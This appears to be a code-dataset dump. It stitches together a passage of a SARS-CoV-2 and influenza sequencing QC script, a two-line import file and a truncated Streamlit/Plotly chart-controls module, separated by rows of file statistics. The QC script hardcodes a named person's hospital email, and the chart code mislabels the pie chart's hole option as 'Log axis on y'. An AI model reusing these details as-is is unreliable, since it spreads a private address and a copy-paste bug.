df_summary = table_asdf(args.summary, '\t')
df_nextclade = table_asdf(args.nextclade, '\t')
df_pangolin = table_asdf(args.pangolin, ',')
df_submatrix = table_asdf(args.submatrix, '\t')
list_submatrix = table_aslist(args.submatrix, '\t')
list_submatrix_header = [ x[0] for x in table_aslist(args.submatrix, '\t') ]
list_submatrix_header_clade = [ x[0].split('_')[0] for x in table_aslist(args.submatrix, '\t') ]
list_submatrix_header_lineage = [ x[0].split('_')[-1] for x in table_aslist(args.submatrix, '\t') ]
list_aarbd = range(333,528)
list_aarbm = range(438,507)
list_nucrbd = range(21563,25386)
list_nucrbm = range(22874,23081)
list_errorplate = args.error_plate.split(',')
df_validation = pd.concat([df_summary.add_prefix('summary_'), df_nextclade.add_prefix('nextclade_'), df_pangolin.add_prefix('pangolin_')], axis=1)
df_validation['val_dp'] = df_validation.apply(lambda x : seek_dp(x.summary_hasdp, '//', args.dp_threshold) , axis=1)
df_validation['val_varcount'] = df_validation[['summary_10-20%', 'summary_20-50%']].apply(lambda x: pd.to_numeric(x, errors='coerce')).sum(axis = 1, skipna = False, min_count=2).apply(lambda x : seek_varcount(x, '//', args.varcount_threshold))
df_validation['val_plate'] = df_validation.apply(lambda x : x.name.split('-')[0] , axis=1)
df_validation['val_sampleid'] = df_validation.apply(lambda x : x.name.split('-')[1].split('_')[0] , axis=1)
df_validation['val_platewell'] = df_validation.apply(lambda x : x.name.split('_')[-1] , axis=1)
df_validation['val_nextclade'] = df_validation.apply(lambda x : validate_column_ncov(x.nextclade_clade, x.summary_percCOV, ';', args.cov_minok) , axis=1)
df_validation['val_pangolin'] = df_validation.apply(lambda x : validate_column_ncov(x.pangolin_lineage, x.summary_percCOV, ';', args.cov_minok) , axis=1)
df_validation['stat_missingpos'] = df_validation.apply(lambda x : list_position(str(x.nextclade_missing), '-', ',') , axis=1)
df_validation['val_rbmcovered'] = df_validation.apply(lambda x : list_intersect(x.stat_missingpos, list_nucrbm, 'exclude', 100) , axis=1)
df_validation['val_classmatch'] = df_validation.apply(lambda x : match_submatrix_ncov(x.val_pangolin, x.val_nextclade, list_submatrix_header, "match") , axis=1)
df_validation['val_classindex'] = df_validation.apply(lambda x : match_submatrix_ncov(x.val_pangolin, x.val_nextclade, list_submatrix_header, "index") , axis=1)
df_validation['val_classcomment'] = df_validation.apply(lambda x : match_submatrix_ncov(x.val_pangolin, x.val_nextclade, list_submatrix_header, "comment") , axis=1)
df_validation['val_insertions'] = df_validation.apply(lambda x : seek_insertion_ncov(str(x.nextclade_insertions)) , axis=1)
df_validation['val_expectedprofile'] = df_validation.apply(lambda x : seek_expectedprofile_ncov(list_submatrix[0], list_submatrix[int(x.val_classindex)]) , axis=1)
df_validation['val_nocovsub'] = df_validation.apply(lambda x : seek_nocovsub_ncov(list_submatrix[0], x.stat_missingpos) , axis=1)
df_validation['val_missingsub'] = df_validation.apply(lambda x : list_intersect(x.val_expectedprofile, [y for y in (str(x.nextclade_aaSubstitutions) + "," + str(x.nextclade_aaDeletions) + "," + str(x.val_insertions)).split(',')], 'missing', 100) , axis=1)
df_validation['val_atypicsub'] = df_validation.apply(lambda x : list_intersect([y for y in (str(x.nextclade_aaSubstitutions)).split(',') if y[0:2] == 'S:' and (int(''.join(filter(str.isdigit, y)))) in list_aarbd and y not in ['', 'nan']], x.val_expectedprofile, 'missing', 100) , axis=1)
df_validation['val_atypicindel'] = df_validation.apply(lambda x : list_intersect([y for y in (str(x.nextclade_aaDeletions) + "," + str(x.val_insertions)).split(',') if y[0:2] == 'S:' and y != 'S:ins214EPE' and y not in ['', 'nan']], x.val_expectedprofile, 'missing', 100) , axis=1)
df_validation['val_result'] = df_validation.apply(lambda x : validate_result_ncov(x.val_nextclade, x.val_dp, x.val_varcount, x.summary_hasposc, x.val_nocovsub, x.val_missingsub) , axis=1)
df_validation['val_commentary'] = df_validation.apply(lambda x : gen_commentary_ncov(x.val_classmatch, [y for y in str(x.nextclade_aaSubstitutions).split(',') if y[0:2] == 'S:' and y not in ['', 'nan']], [y for y in str(x.nextclade_aaDeletions).split(',') if y[0:2] == 'S:' and y not in ['', 'nan']], [y for y in str(x.val_insertions).split(',') if y[0:2] == 'S:' and y not in ['', 'nan']], x.val_nocovsub, x.val_classcomment, x.val_atypicsub.split(';'), x.val_atypicindel.split(';')), axis=1)
df_validation['val_error'] = df_validation.apply(lambda x : 'ERROR' if x.val_plate in list_errorplate else "OK", axis=1)
df_validation['stat_simpleprofile'] = df_validation.apply(lambda x : x.val_nextclade + ' - ' + x.val_atypicsub , axis=1)
df_var_major = filter_dfrownames(df_var, ['|MAJOR'], 'keep')
df_var_major_indel = filter_dfrownames(df_var_major, ['|DEL|', '|INS|', '|COMPLEX|'], 'keep')
df_validation_sample = filter_dfrownames(df_validation, ['Tpos', 'PCR', 'NT', 'Neg', 'neg', 'T-', 'TVide', 'Tvide'], 'drop')
df_validation_control = filter_dfrownames(df_validation, ['Tpos', 'PCR', 'NT', 'Neg', 'neg', 'T-', 'TVide', 'Tvide'], 'keep')
df_validation_nt = filter_dfrownames(df_validation, ['NT', 'PCR', 'Neg', 'neg', 'T-', 'TVide', 'Tvide'], 'keep')
df_validation_20a = filter_dfrownames(df_validation, ['TposPl'], 'keep')
df_validation_20j = filter_dfrownames(df_validation, ['TposV3'], 'keep')
df_validation_19b = filter_dfrownames(df_validation, ['Tpos19B'], 'keep')
df_var_major_indel[df_var_major_indel > 0].count(axis=1).to_csv(args.outdir + run_date + '_' + datatype + '_indel.tsv', sep='\t', index_label='variant', header=["count"])
df_validation_control[['summary_percCOV', 'nextclade_clade', 'nextclade_totalAminoacidSubstitutions']].replace(r'^\s*$', np.nan, regex=True).fillna('ININT').to_csv(args.outdir + run_date + '_' + datatype + '_control.tsv', sep='\t', index_label='control')
df_validation_sample['stat_simpleprofile'].value_counts().sort_index(axis = 0).to_csv(args.outdir + run_date + '_' + datatype + '_runsummary.tsv', sep='\t', index_label='Clade')
df_metrics = pd.concat([
df_validation_sample[df_validation_sample['summary_percCOV'].apply(pd.to_numeric, errors='coerce') < args.cov_minok]['val_plate'].value_counts(),
df_validation_sample.loc[(~df_validation_sample['val_dp'].isin(['NO','NA'])) & (~df_validation_sample['val_commentary'].isin(['DSC','NA']))]['val_plate'].value_counts(),
df_validation_sample.loc[(~df_validation_sample['val_varcount'].isin(['NO','NA'])) & (~df_validation_sample['val_commentary'].isin(['DSC','NA']))]['val_plate'].value_counts(),
df_validation_sample[df_validation_sample['summary_hasposc'].isin(['FAILED'])]['val_plate'].value_counts(),
df_validation_nt[df_validation_nt['summary_percCOV'].apply(pd.to_numeric, errors='coerce') >= args.cov_maxneg]['val_plate'].value_counts(),
df_validation_20a.loc[(df_validation_20a['nextclade_clade'].isin(['20A'])) & (df_validation_20a['nextclade_totalAminoacidSubstitutions'].apply(pd.to_numeric, errors='coerce') <= 6.0)]['val_plate'].value_counts().add(df_validation_20j[df_validation_20j['nextclade_clade'].isin(['20J (Gamma, V3)'])]['val_plate'].value_counts(), fill_value=0).add(df_validation_19b[df_validation_19b['nextclade_clade'].isin(['19B'])]['val_plate'].value_counts(), fill_value=0)],axis=1).fillna(0).astype(int)
df_metrics.columns = ['sample_cov<=' + str(args.cov_minok), 'sample_dp>=' + str(args.dp_threshold), 'sample_varcount>=' + str(args.varcount_threshold), 'sample_ci_failed', 'tneg_cov>=' + str(args.cov_maxneg), 'tpos_ok']
df_metrics.sort_index(axis = 0).to_csv(args.outdir + run_date + '_' + datatype + '_metric.tsv', sep='\t', index_label='plate')
pd.concat([df_validation[df_validation.filter(regex='summary_').columns], df_validation[df_validation.filter(regex='val_').columns], df_validation[df_validation.filter(regex='nextclade_').columns], df_validation[df_validation.filter(regex='pangolin_').columns]], axis=1).to_csv(args.outdir + run_date + '_' + datatype + '_validation.tsv', sep='\t', index_label='SampleID')
df_export = pd.DataFrame(df_validation, columns = ['val_sampleid'])
df_export['Instrument ID(s)'] = "NB552333"
df_export['Analysis authorized by'] = "laurence.josset@chu-lyon.fr"
df_export['AssayResultTargetCode'] = "SeqArt"
df_export['Target_1_cq'] = df_validation.apply(lambda x : x.val_result.replace(',',';') if x.val_error != 'ERROR' else 'ERREUR-' + x.val_result.replace(',',';'), axis=1)
df_export['Target_2_cq'] = df_validation.apply(lambda x : x.val_pangolin.replace(',',';') if x.val_error != 'ERROR' else 'ERREUR-' + x.val_pangolin.replace(',',';'), axis=1)
df_export['Target_3_cq'] = df_validation.apply(lambda x : x.val_commentary.replace(',',';') if x.val_error != 'ERROR' else 'ERREUR-' + x.val_commentary.replace(',',';'), axis=1)
df_export.rename(columns={df_export.columns[0]: 'Sample ID'}).to_csv(args.outdir + run_date + '_' + datatype + '_fastfinder.csv', sep=',', index = False)
if args.mode == 'fluabv':
run_date = args.rundate
datatype = args.submatrix.split('_')[1]
submatrix_version = args.submatrix.split('-')[-1].split('.')[0]
df_var = table_asdf(args.vartable, '\t')
df_var = df_var.apply(pd.to_numeric, errors='coerce').fillna(df_var)
df_summary = table_asdf(args.summary, '\t')
df_nextclade = table_asdf(args.nextclade, '\t')
df_submatrix = table_asdf(args.submatrix, '\t')
list_submatrix = table_aslist(args.submatrix, '\t')
list_submatrix_header = [ x[0] for x in table_aslist(args.submatrix, '\t') ]
list_submatrix_header_clade = [ x[0].split('_')[0] for x in table_aslist(args.submatrix, '\t') ]
list_submatrix_header_lineage = [ x[0].split('_')[-1] for x in table_aslist(args.submatrix, '\t') ]
list_profile_base = table_aslist(args.submatrix, '\t')[0][1:]
df_validation = pd.concat([df_summary.add_prefix('summary_'), df_nextclade.add_prefix('nextclade_')], axis=1)
df_validation['val_dp'] = df_validation.apply(lambda x : seek_dp(x.summary_hasdp, '//', args.dp_threshold) , axis=1)
df_validation['val_varcount'] = df_validation[['summary_10-20%', 'summary_20-50%']].apply(lambda x: pd.to_numeric(x, errors='coerce')).sum(axis = 1, skipna = False, min_count=2).apply(lambda x : seek_varcount(x, '//', args.varcount_threshold))
df_validation['val_plate'] = df_validation.apply(lambda x : x.name.split('-')[0] , axis=1)
df_validation['val_sampleid'] = df_validation.apply(lambda x : x.name.split('-')[1].split('_')[0] , axis=1)
df_validation['val_platewell'] = df_validation.apply(lambda x : x.name.split('_')[-1] , axis=1)
df_validation['val_nextclade'] = df_validation.apply(lambda x : validate_column_fluabv(x.nextclade_clade, x.summary_PercCOV_S4, x.summary_PercCOV_S6, ';', args.cov_minok, x['nextclade_qc.overallStatus']) , axis=1)
df_validation['stat_missingpos'] = df_validation.apply(lambda x : list_position(str(x.nextclade_missing), '-', ',') , axis=1)
df_validation['val_classmatch'] = df_validation.apply(lambda x : match_submatrix_fluabv('', x.val_nextclade, list_submatrix_header, "match") , axis=1)
df_validation['val_classindex'] = df_validation.apply(lambda x : match_submatrix_fluabv('', x.val_nextclade, list_submatrix_header, "index") , axis=1)
df_validation['val_classcomment'] = df_validation.apply(lambda x : match_submatrix_fluabv('', x.val_nextclade, list_submatrix_header, "comment") , axis=1)
df_validation['val_insertions'] = df_validation.apply(lambda x : seek_insertion_fluabv(str(x.nextclade_insertions)) , axis=1)
df_validation['val_expectedprofile'] = df_validation.apply(lambda x : seek_expectedprofile_fluabv(list_submatrix[0], list_submatrix[int(x.val_classindex)]) , axis=1)
df_validation['val_nocovsub'] = df_validation.apply(lambda x : seek_nocovsub_fluabv(list_submatrix[0], x.stat_missingpos) , axis=1)
df_validation['val_missingsub'] = df_validation.apply(lambda x : list_intersect(x.val_expectedprofile, [y for y in (str(x.nextclade_aaSubstitutions) + "," + str(x.nextclade_aaDeletions) + "," + str(x.val_insertions)).split(',') if y not in ['', 'nan']], 'missing', 100) , axis=1)
df_validation['val_atypicsub'] = df_validation.apply(lambda x : list_intersect([y for y in (str(x.nextclade_aaSubstitutions)).split(',') if y not in ['', 'nan']], x.val_expectedprofile, 'missing', 100) , axis=1)
df_validation['val_atypicindel'] = df_validation.apply(lambda x : list_intersect([y for y in (str(x.nextclade_aaDeletions) + "," + str(x.val_insertions)).split(',') if y not in ['', 'nan']], x.val_expectedprofile, 'missing', 100) , axis=1)
df_validation['val_result'] = df_validation.apply(lambda x : validate_result_fluabv(x.val_nextclade, x.val_dp, x.val_varcount, x.summary_hasposc, x.val_nocovsub, x.val_missingsub) , axis=1)
df_validation['val_commentary'] = df_validation.apply(lambda x : gen_commentary_fluabv(x.val_classmatch, [y for y in str(x.nextclade_aaSubstitutions).split(',') if y not in ['', 'nan'] and y[:-1] in list_profile_base], [y for y in str(x.nextclade_aaDeletions).split(',') if y not in ['', 'nan'] and y[:-1] in list_profile_base], [y for y in str(x.val_insertions).split(',') if y not in ['', 'nan'] and (y.split(':')[0] + ':') in list_profile_base], x.val_nocovsub, x.val_classcomment, x.val_atypicsub.split(';'), x.val_atypicindel.split(';')), axis=1)
df_validation['stat_simpleprofile'] = df_validation.apply(lambda x : x.val_nextclade + ' - ' + x.val_atypicsub , axis=1)
df_var_major = filter_dfrownames(df_var, ['|MAJOR'], 'keep')
df_var_major_indel = filter_dfrownames(df_var_major, ['|DEL|', '|INS|', '|COMPLEX|'], 'keep')
df_validation_sample = filter_dfrownames(df_validation, ['Tpos', 'PCR', 'NT', 'Neg', 'neg', 'T-', 'TVide', 'Tvide'], 'drop')
df_validation_control = filter_dfrownames(df_validation, ['Tpos', 'PCR', 'NT', 'Neg', 'neg', 'T-', 'TVide', 'Tvide'], 'keep')
df_validation_nt = filter_dfrownames(df_validation, ['NT', 'PCR', 'Neg', 'neg', 'T-', 'TVide', 'Tvide'], 'keep')
df_var_major_indel[df_var_major_indel > 0].count(axis=1).to_csv(args.outdir + run_date + '_' + datatype + '_indel.tsv', sep='\t', index_label='variant', header=["count"])
df_validation_control[['summary_PercCOV_S4', 'summary_PercCOV_S6', 'nextclade_clade', 'nextclade_totalAminoacidSubstitutions']].replace(r'^\s*$', np.nan, regex=True).fillna('ININT').to_csv(args.outdir + run_date + '_' + datatype + '_control.tsv', sep='\t', index_label='control')
df_validation_sample['stat_simpleprofile'].value_counts().sort_index(axis = 0).to_csv(args.outdir + run_date + '_' + datatype + '_runsummary.tsv', sep='\t', index_label='Clade')
df_metrics = pd.concat([
df_validation_sample.loc[(df_validation_sample['summary_PercCOV_S4'].apply(pd.to_numeric, errors='coerce') < args.cov_minok) & (df_validation_sample['summary_PercCOV_S6'].apply(pd.to_numeric, errors='coerce') < args.cov_minok)]['val_plate'].value_counts(),
df_validation_sample.loc[(~df_validation_sample['val_dp'].isin(['NO','NA'])) & (~df_validation_sample['val_commentary'].isin(['DSC','NA']))]['val_plate'].value_counts(),
df_validation_sample.loc[(~df_validation_sample['val_varcount'].isin(['NO','NA'])) & (~df_validation_sample['val_commentary'].isin(['DSC','NA']))]['val_plate'].value_counts(),
df_validation_sample[df_validation_sample['summary_hasposc'].isin(['FAILED'])]['val_plate'].value_counts(),
df_validation_nt.loc[(df_validation_nt['summary_PercCOV_S4'].apply(pd.to_numeric, errors='coerce') >= args.cov_maxneg) & (df_validation_nt['summary_PercCOV_S6'].apply(pd.to_numeric, errors='coerce') >= args.cov_maxneg)]['val_plate'].value_counts()],axis=1).fillna(0).astype(int)
df_metrics.columns = ['sample_cov<=' + str(args.cov_minok), 'sample_dp>=' + str(args.dp_threshold), 'sample_varcount>=' + str(args.varcount_threshold), 'sample_ci_failed', 'tneg_cov>=' + str(args.cov_maxneg)]
df_metrics.sort_index(axis = 0).to_csv(args.outdir + run_date + '_' + datatype + '_metric.tsv', sep='\t', index_label='plate')
pd.concat([df_validation[df_validation.filter(regex='summary_').columns], df_validation[df_validation.filter(regex='val_').columns], df_validation[df_validation.filter(regex='nextclade_').columns]], axis=1).to_csv(args.outdir + run_date + '_' + datatype + '_validation.tsv', sep='\t', index_label='SampleID')
df_validation_sample_notna = df_validation_sample[~df_validation_sample['summary_PercCOV_S4'].isin(['NA'])]
df_export = pd.DataFrame(df_validation_sample_notna, columns = ['val_sampleid'])
df_export['Instrument ID(s)'] = "NB552333"
df_export['Analysis authorized by'] = "laurence.josset@chu-lyon.fr"
df_export['AssayResultTargetCode'] = "GABILL"
df_export['AssayResult'] = df_validation_sample_notna.apply(lambda x : x.val_result.replace(',',';') , axis=1)
df_export.rename(columns={df_export.columns[0]: 'Sample ID'}).to_csv(args.outdir + run_date + '_' + datatype + '_fastfinder.csv', sep=',', index = False)
df_export = pd.DataFrame(df_validation_sample_notna, columns = ['val_sampleid'])
df_export['Instrument ID(s)'] = "NB552333"
df_export['Analysis authorized by'] = "laurence.josset@chu-lyon.fr"
df_export['AssayResultTargetCode'] = "COMGRAB"
df_export['AssayResult'] = df_validation_sample_notna.apply(lambda x : x.val_commentary.replace(',',';') , axis=1)
df_export.rename(columns={df_export.columns[0]: 'Sample ID'}).to_csv(args.outdir + run_date + '_' + datatype + '_fastfinder.csv', sep=',', index = False, mode='a', header=False)
| 58.134959 | 555 | 0.655693 | 4,839 | 35,753 | 4.631949 | 0.077495 | 0.087802 | 0.025698 | 0.043098 | 0.810699 | 0.789997 | 0.753012 | 0.730659 | 0.704515 | 0.695191 | 0 | 0.014821 | 0.167762 | 35,753 | 614 | 556 | 58.229642 | 0.738464 | 0.002545 | 0 | 0.540755 | 0 | 0.001988 | 0.134689 | 0.00788 | 0.021869 | 0 | 0 | 0 | 0 | 1 | 0.049702 | false | 0.007952 | 0.00994 | 0 | 0.204771 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
f49b1ded7d4e5f4d03753ccb1cd90eb2f7ef5a2c | 43 | py | Python | auth_code.py | nivw/onna_test | 518c726a656493a5efd7ed6f548f68b2f5350260 | [
"BSD-2-Clause"
] | null | null | null | auth_code.py | nivw/onna_test | 518c726a656493a5efd7ed6f548f68b2f5350260 | [
"BSD-2-Clause"
] | null | null | null | auth_code.py | nivw/onna_test | 518c726a656493a5efd7ed6f548f68b2f5350260 | [
"BSD-2-Clause"
] | 1 | 2020-06-24T16:52:59.000Z | 2020-06-24T16:52:59.000Z | import requests
from config import config
| 10.75 | 25 | 0.837209 | 6 | 43 | 6 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.162791 | 43 | 3 | 26 | 14.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
761e2504d6c27c36118ff42cb890b2d3a7ef8bde | 18,135 | py | Python | src/graph_controls.py | bodealamu/opencharts | 6ce5be07d998cc5affef0080b0e73f4b1be1ab42 | [
"MIT"
] | 4 | 2021-07-18T13:33:11.000Z | 2021-09-15T07:25:12.000Z | src/graph_controls.py | bodealamu/opencharts | 6ce5be07d998cc5affef0080b0e73f4b1be1ab42 | [
"MIT"
] | null | null | null | src/graph_controls.py | bodealamu/opencharts | 6ce5be07d998cc5affef0080b0e73f4b1be1ab42 | [
"MIT"
] | 1 | 2021-07-26T12:40:07.000Z | 2021-07-26T12:40:07.000Z | import streamlit as st
import plotly.express as px
from src.image_export import show_export_format
def graph_controls(chart_type, df, dropdown_options, template):
"""
Function which determines the widgets that would be shown for the different chart types
:param chart_type: str, name of chart
:param df: uploaded dataframe
:param dropdown_options: list of column names
:param template: str, representation of the selected theme
:return:
"""
length_of_options = len(dropdown_options)
length_of_options -= 1
plot = px.scatter()
if chart_type == 'Scatter plots':
st.sidebar.subheader("Scatterplot Settings")
try:
x_values = st.sidebar.selectbox('X axis', index=length_of_options,options=dropdown_options)
y_values = st.sidebar.selectbox('Y axis',index=length_of_options, options=dropdown_options)
color_value = st.sidebar.selectbox("Color", index=length_of_options,options=dropdown_options)
symbol_value = st.sidebar.selectbox("Symbol",index=length_of_options, options=dropdown_options)
size_value = st.sidebar.selectbox("Size", index=length_of_options,options=dropdown_options)
hover_name_value = st.sidebar.selectbox("Hover name", index=length_of_options,options=dropdown_options)
facet_row_value = st.sidebar.selectbox("Facet row",index=length_of_options, options=dropdown_options,)
facet_column_value = st.sidebar.selectbox("Facet column", index=length_of_options,
options=dropdown_options)
marginalx = st.sidebar.selectbox("Marginal X", index=2,options=['rug', 'box', None,
'violin', 'histogram'])
marginaly = st.sidebar.selectbox("Marginal Y", index=2,options=['rug', 'box', None,
'violin', 'histogram'])
log_x = st.sidebar.selectbox('Log axis on x', options=[True, False])
log_y = st.sidebar.selectbox('Log axis on y', options=[True, False])
title = st.sidebar.text_input(label='Title of chart')
plot = px.scatter(data_frame=df,
x=x_values,
y=y_values,
color=color_value,
symbol=symbol_value,
size=size_value,
hover_name=hover_name_value,
facet_row=facet_row_value,
facet_col=facet_column_value,
log_x=log_x, log_y=log_y,marginal_y=marginaly, marginal_x=marginalx,
template=template, title=title)
except Exception as e:
print(e)
if chart_type == 'Histogram':
st.sidebar.subheader("Histogram Settings")
try:
x_values = st.sidebar.selectbox('X axis', index=length_of_options,options=dropdown_options)
y_values = st.sidebar.selectbox('Y axis',index=length_of_options, options=dropdown_options)
nbins = st.sidebar.number_input(label='Number of bins', min_value=2, value=5)
color_value = st.sidebar.selectbox("Color", index=length_of_options,options=dropdown_options)
barmode = st.sidebar.selectbox('bar mode', options=['group', 'overlay','relative'], index=2)
marginal = st.sidebar.selectbox("Marginal", index=2,options=['rug', 'box', None,
'violin', 'histogram'])
barnorm = st.sidebar.selectbox('Bar norm', options=[None, 'fraction', 'percent'], index=0)
hist_func = st.sidebar.selectbox('Histogram aggregation function', index=0,
options=['count','sum', 'avg', 'min', 'max'])
histnorm = st.sidebar.selectbox('Hist norm', options=[None, 'percent', 'probability', 'density',
'probability density'], index=0)
hover_name_value = st.sidebar.selectbox("Hover name", index=length_of_options,options=dropdown_options)
facet_row_value = st.sidebar.selectbox("Facet row",index=length_of_options, options=dropdown_options,)
facet_column_value = st.sidebar.selectbox("Facet column", index=length_of_options,
options=dropdown_options)
cummulative = st.sidebar.selectbox('Cummulative', options=[False, True])
log_x = st.sidebar.selectbox('Log axis on x', options=[True, False])
log_y = st.sidebar.selectbox('Log axis on y', options=[True, False])
title = st.sidebar.text_input(label='Title of chart')
plot = px.histogram(data_frame=df,barmode=barmode,histnorm=histnorm,
marginal=marginal,barnorm=barnorm,histfunc=hist_func,
x=x_values,y=y_values,cumulative=cummulative,
color=color_value,hover_name=hover_name_value,
facet_row=facet_row_value,nbins=nbins,
facet_col=facet_column_value,log_x=log_x,
log_y=log_y,template=template, title=title)
except Exception as e:
print(e)
# if chart_type == 'Line plots':
# st.sidebar.subheader("Line plots Settings")
#
# try:
# x_values = st.sidebar.selectbox('X axis', index=length_of_options, options=dropdown_options)
# y_values = st.sidebar.selectbox('Y axis', options=dropdown_options)
# color_value = st.sidebar.selectbox("Color", index=length_of_options, options=dropdown_options)
# line_group = st.sidebar.selectbox("Line group", options=dropdown_options)
# line_dash = st.sidebar.selectbox("Line dash", index=length_of_options,options=dropdown_options)
# hover_name_value = st.sidebar.selectbox("Hover name", index=length_of_options, options=dropdown_options)
# facet_row_value = st.sidebar.selectbox("Facet row", index=length_of_options, options=dropdown_options, )
# facet_column_value = st.sidebar.selectbox("Facet column", index=length_of_options,
# options=dropdown_options)
# log_x = st.sidebar.selectbox('Log axis on x', options=[True, False])
# log_y = st.sidebar.selectbox('Log axis on y', options=[True, False])
# title = st.sidebar.text_input(label='Title of chart')
# plot = px.line(data_frame=df,
# line_group=line_group,
# line_dash=line_dash,
# x=x_values,y=y_values,
# color=color_value,
# hover_name=hover_name_value,
# facet_row=facet_row_value,
# facet_col=facet_column_value,
# log_x=log_x,
# log_y=log_y,
# template=template,
# title=title)
# except Exception as e:
# print(e)
if chart_type == 'Violin plots':
st.sidebar.subheader('Violin plot Settings')
try:
x_values = st.sidebar.selectbox('X axis', index=length_of_options,options=dropdown_options)
y_values = st.sidebar.selectbox('Y axis',index=length_of_options, options=dropdown_options)
color_value = st.sidebar.selectbox("Color", index=length_of_options,options=dropdown_options)
violinmode = st.sidebar.selectbox('Violin mode', options=['group', 'overlay'])
box = st.sidebar.selectbox("Show box", options=[False, True])
outliers = st.sidebar.selectbox('Show points', options=[False, 'all', 'outliers', 'suspectedoutliers'])
hover_name_value = st.sidebar.selectbox("Hover name", index=length_of_options,options=dropdown_options)
facet_row_value = st.sidebar.selectbox("Facet row",index=length_of_options, options=dropdown_options,)
facet_column_value = st.sidebar.selectbox("Facet column", index=length_of_options,
options=dropdown_options)
log_x = st.sidebar.selectbox('Log axis on x', options=[True, False])
log_y = st.sidebar.selectbox('Log axis on y', options=[True, False])
title = st.sidebar.text_input(label='Title of chart')
plot = px.violin(data_frame=df,x=x_values,
y=y_values,color=color_value,
hover_name=hover_name_value,
facet_row=facet_row_value,
facet_col=facet_column_value,box=box,
log_x=log_x, log_y=log_y,violinmode=violinmode,points=outliers,
template=template, title=title)
except Exception as e:
print(e)
if chart_type == 'Box plots':
st.sidebar.subheader('Box plot Settings')
try:
x_values = st.sidebar.selectbox('X axis', index=length_of_options, options=dropdown_options)
y_values = st.sidebar.selectbox('Y axis', index=length_of_options, options=dropdown_options)
color_value = st.sidebar.selectbox("Color", index=length_of_options, options=dropdown_options)
boxmode = st.sidebar.selectbox('Violin mode', options=['group', 'overlay'])
outliers = st.sidebar.selectbox('Show outliers', options=[False, 'all', 'outliers', 'suspectedoutliers'])
hover_name_value = st.sidebar.selectbox("Hover name", index=length_of_options, options=dropdown_options)
facet_row_value = st.sidebar.selectbox("Facet row", index=length_of_options, options=dropdown_options, )
facet_column_value = st.sidebar.selectbox("Facet column", index=length_of_options,
options=dropdown_options)
log_x = st.sidebar.selectbox('Log axis on x', options=[True, False])
log_y = st.sidebar.selectbox('Log axis on y', options=[True, False])
notched = st.sidebar.selectbox('Notched', options=[True, False])
title = st.sidebar.text_input(label='Title of chart')
plot = px.box(data_frame=df, x=x_values,
y=y_values, color=color_value,
hover_name=hover_name_value,facet_row=facet_row_value,
facet_col=facet_column_value, notched=notched,
log_x=log_x, log_y=log_y, boxmode=boxmode, points=outliers,
template=template, title=title)
except Exception as e:
print(e)
if chart_type == 'Sunburst':
st.sidebar.subheader('Sunburst Settings')
try:
path_value = st.sidebar.multiselect(label='Path', options=dropdown_options)
color_value = st.sidebar.selectbox(label='Color', options=dropdown_options)
value = st.sidebar.selectbox("Value", index=length_of_options, options=dropdown_options)
title = st.sidebar.text_input(label='Title of chart')
plot = px.sunburst(data_frame=df,path=path_value,values=value,
color=color_value, title=title )
except Exception as e:
print(e)
if chart_type == 'Tree maps':
st.sidebar.subheader('Tree maps Settings')
try:
path_value = st.sidebar.multiselect(label='Path', options=dropdown_options)
color_value = st.sidebar.selectbox(label='Color', options=dropdown_options)
value = st.sidebar.selectbox("Value", index=length_of_options, options=dropdown_options)
title = st.sidebar.text_input(label='Title of chart')
plot = px.treemap(data_frame=df,path=path_value,values=value,
color=color_value, title=title )
except Exception as e:
print(e)
if chart_type == 'Pie Charts':
st.sidebar.subheader('Pie Chart Settings')
try:
name_value = st.sidebar.selectbox(label='Name (Selected Column should be categorical)', options=dropdown_options)
color_value = st.sidebar.selectbox(label='Color(Selected Column should be categorical)', options=dropdown_options)
value = st.sidebar.selectbox("Value", index=length_of_options, options=dropdown_options)
hole = st.sidebar.selectbox('Log axis on y', options=[True, False])
title = st.sidebar.text_input(label='Title of chart')
plot = px.pie(data_frame=df,names=name_value,hole=hole,
values=value,color=color_value, title=title)
except Exception as e:
print(e)
if chart_type == 'Density contour':
st.sidebar.subheader("Density contour Settings")
try:
x_values = st.sidebar.selectbox('X axis', index=length_of_options,options=dropdown_options)
y_values = st.sidebar.selectbox('Y axis',index=length_of_options, options=dropdown_options)
z_value = st.sidebar.selectbox("Z axis", index=length_of_options, options=dropdown_options)
color_value = st.sidebar.selectbox("Color", index=length_of_options,options=dropdown_options)
hist_func = st.sidebar.selectbox('Histogram aggregation function', index=0,
options=['count', 'sum', 'avg', 'min', 'max'])
histnorm = st.sidebar.selectbox('Hist norm', options=[None, 'percent', 'probability', 'density',
'probability density'], index=0)
hover_name_value = st.sidebar.selectbox("Hover name", index=length_of_options,options=dropdown_options)
facet_row_value = st.sidebar.selectbox("Facet row",index=length_of_options, options=dropdown_options,)
facet_column_value = st.sidebar.selectbox("Facet column", index=length_of_options,
options=dropdown_options)
marginalx = st.sidebar.selectbox("Marginal X", index=2,options=['rug', 'box', None,
'violin', 'histogram'])
marginaly = st.sidebar.selectbox("Marginal Y", index=2,options=['rug', 'box', None,
'violin', 'histogram'])
log_x = st.sidebar.selectbox('Log axis on x', options=[True, False],index=1)
log_y = st.sidebar.selectbox('Log axis on y', options=[True, False], index=1)
title = st.sidebar.text_input(label='Title of chart')
plot = px.density_contour(data_frame=df,x=x_values,y=y_values, color=color_value,
z=z_value, histfunc=hist_func,histnorm=histnorm,
hover_name=hover_name_value,facet_row=facet_row_value,
facet_col=facet_column_value,log_x=log_x,
log_y=log_y,marginal_y=marginaly, marginal_x=marginalx,
template=template, title=title)
except Exception as e:
print(e)
if chart_type == 'Density heatmaps':
st.sidebar.subheader("Density heatmap Settings")
try:
x_values = st.sidebar.selectbox('X axis', index=length_of_options, options=dropdown_options)
